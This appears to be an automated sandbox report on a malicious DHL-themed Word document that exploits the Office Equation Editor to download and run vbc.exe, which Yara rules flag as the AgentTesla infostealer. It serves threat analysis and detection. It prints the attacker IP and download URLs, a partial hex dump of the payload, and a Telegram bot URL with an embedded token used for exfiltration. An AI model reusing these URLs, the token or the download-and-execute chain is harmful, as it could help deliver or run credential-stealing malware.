Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80

Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 198.23.207.54:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Aug 2022 14:36:14 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6Last-Modified: Tue, 19 Jul 2022 05:10:31 GMTETag: "cd000-5e42180eec4e9"Accept-Ranges: bytesContent-Length: 839680Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f 5d 9e ba 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 c8 0c 00 00 06 00 00 00 00 00 00 9a e6 0c 00 00 20 00 00 00 00 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 e6 0c 00 4f 00 00 00 00 00 0d 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 0c 00 00 00 2c e6 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 c6 0c 00 00 20 00 00 00 c8 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 03 00 00 00 00 0d 00 00 04 00 00 00 ca 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0d 00 00 02 00 00 00 ce 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c e6 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 70 5c 00 00 c4 58 00 00 03 00 00 00 37 00 00 06 34 b5 00 00 f8 30 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 02 14 7d 01 00 00 04 02 28 15 00 00 0a 00 00 02 28 09 00 00 06 00 2a 1b 30 03 00 d1 00 00 00 01 00 00 11 00 03 8c 01 00 00 1b 14 fe 03 0a 06 39 bf 00 00 00 00 02 7b 02 00 00 04 6f 16 00 00 0a 6f 17 00 00 0a 73 18 00 00 0a 0b 00 02 7b 02 00 00 04 6f 16 00 00 0a 6f 19 00 00 0a 0c 2b 5d 08 6f 1a 00 00 0a 74 16 00 00 01 0d 00 0f 01 fe 16 01 00 00 1b 6f 1b 00 00 0a 09 6f 1c 00 00 0a 6f 1d 00 00 0a 6f 1e 00 00 0a 13 04 11 04 14 28 1f 00 00 0a 13 06 11 06 2c 14 00 11 04 03 8c 01 00 00 1b 14 6f 20 00 00 0a 13 05 00 2b 05 00 14 13 05 00 07 11 05 6f 21 00 00 0a 00 00 08 6f 22 00 00 0a 2d 9b de 15 08 75 18 00 00 01 13 07 11 07 2c 08 11 07 6f 23 00 00 0a 00 dc 02 7b 02 00 00 04 6f 24 00 00 0a 07 6f 25 00 00 0a 6f 26 00 00 0a 26 00 2a 00 00 00 01 10 00 00 02 00 3a 00 69 a3 00 15 00 00 00 00 13 30 02 00 32 00 00 00 02 00 00 11 00 02 7b 02 00 00 04 6f 27 00 00 0a 6f 17 00 00 0a 16 30 03

Source: global traffic	HTTP traffic detected: GET /shp/doc_200.doc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 198.23.207.54Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /200/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.207.54Connection: Keep-Alive

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 9_2_036406B9 URLDownloadToFileW,ShellExecuteW,ExitProcess,

9_2_036406B9

Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.207.54

Source: EQNEDT32.EXE, 00000009.00000002.942059821.000000000097F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com= equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000009.00000002.942059821.000000000097F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: EQNEDT32.EXE, 00000009.00000002.941922174.000000000091F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.23.207.54/200/vbc.exe
Source: EQNEDT32.EXE, 00000009.00000002.941922174.000000000091F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.23.207.54/200/vbc.exehhC:
Source: EQNEDT32.EXE, 00000009.00000002.942263460.0000000003640000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://198.23.207.54/200/vbc.exej
Source: shp on 198.23.207.54.url.0.dr	String found in binary or memory: http://198.23.207.54/shp/
Source: doc_200.doc.url.0.dr	String found in binary or memory: http://198.23.207.54/shp/doc_200.doc
Source: vbc.exe, 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/
Source: vbc.exe, 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{ADD09414-4C0B-48D8-B1C9-FBE697880796}.tmp

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 9_2_036406B9 URLDownloadToFileW,ShellExecuteW,ExitProcess,

9_2_036406B9

Source: global traffic	HTTP traffic detected: GET /shp/doc_200.doc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 198.23.207.54Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /200/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.207.54Connection: Keep-Alive

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.vbc.exe.331cbe8.10.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 10.2.vbc.exe.331cbe8.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 10.2.vbc.exe.32e69c8.9.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 10.2.vbc.exe.32e69c8.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc_200[1].doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\694BA9C1.doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: 10.2.vbc.exe.331cbe8.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 10.2.vbc.exe.331cbe8.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 10.2.vbc.exe.32e69c8.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 10.2.vbc.exe.32e69c8.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc_200[1].doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\694BA9C1.doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.

Source: C:\Users\Public\vbc.exe	Code function: 10_2_00389118	10_2_00389118
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00386638	10_2_00386638
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00382790	10_2_00382790
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00389108	10_2_00389108
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0038962F	10_2_0038962F
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0038277B	10_2_0038277B
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00700960	10_2_00700960
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00720048	10_2_00720048
Source: C:\Users\Public\vbc.exe	Code function: 10_2_003800C8	10_2_003800C8
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00380F32	10_2_00380F32

Source: ~WRF{61C0FE69-632E-42B0-9EAB-CB8720AB2605}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe 676A71156FF2422AF1B291E83030EF217607574E2EEB0344AF54A4CD7E99D8A8
Source: Joe Sandbox View	Dropped File: C:\Users\Public\vbc.exe 676A71156FF2422AF1B291E83030EF217607574E2EEB0344AF54A4CD7E99D8A8

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: vbc[1].exe.9.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vbc.exe.9.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: DHL_AWB.docx	Virustotal: Detection: 22%
Source: DHL_AWB.docx	ReversingLabs: Detection: 28%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

